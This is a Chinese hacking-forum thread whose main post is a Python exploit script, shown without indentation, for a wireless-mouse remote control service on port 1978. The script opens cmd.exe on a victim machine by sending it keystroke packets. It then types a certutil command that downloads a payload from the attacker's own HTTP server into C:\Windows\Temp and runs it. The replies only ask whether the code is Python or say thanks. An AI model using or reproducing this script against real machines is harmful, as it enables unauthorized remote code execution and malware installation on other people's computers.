无线鼠标

wolf0000 · 发表于 2022-7-8 00:48:22

from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys
import string
target = socket(AF_INET, SOCK_STREAM)
port = 1978
try:
rhost = sys.argv[1]
lhost = sys.argv[2]
payload = sys.argv[3]
except:
print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>")
exit()
characters={
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
"\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
def openCMD():
target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe
def SendString(string):
for char in string:
target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding
sleep(0.03)
def SendReturn():
target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
sleep(0.5)
def exploit():
print("[+] 3..2..1..")
sleep(2)
openCMD()
print("[+] *Super fast hacker typing*")
sleep(1)
SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\" + payload)
SendReturn()
print("[+] Retrieving payload")
sleep(3)
SendString("C:\\Windows\\Temp\" + payload)
SendReturn()
print("[+] Done! Check Your Listener?")
def main():
target.connect((rhost,port))
exploit()
target.close()
exit()
if __name__=="__main__":
main()

复制代码

alglsf666 · 发表于 2024-3-3 14:10:29

这是什么编程语言？5,8,16,17,28,29,62行看起来不像python呀

H.U.C清风 · 发表于 2024-6-7 20:56:39

谢谢分享，已回复。

H.U.C清风 · 发表于 2024-6-7 20:57:24

这是python吗？

15168653310 · 发表于 2024-11-24 14:52:35

这是python吗？

Pingchas · 发表于 2024-11-24 20:02:18

python。

		自动登录	找回密码
密码			注册

无线鼠标

本帖子中包含更多资源

点评

站点统计| 举报| Archiver| 手机版| 黑屋 |

备案号：冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

无线鼠标

本帖子中包含更多资源

点评

站点统计| 举报| Archiver| 手机版| 黑屋 | pgvMain({"discuzParams":{"r2":"3503899","ui":0,"rt":"forum","md":"viewthread","fi":"23","ti":"658","pn":1,"qq":"000"},"extraParams":""});

备案号：冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

站点统计| 举报| Archiver| 手机版| 黑屋 |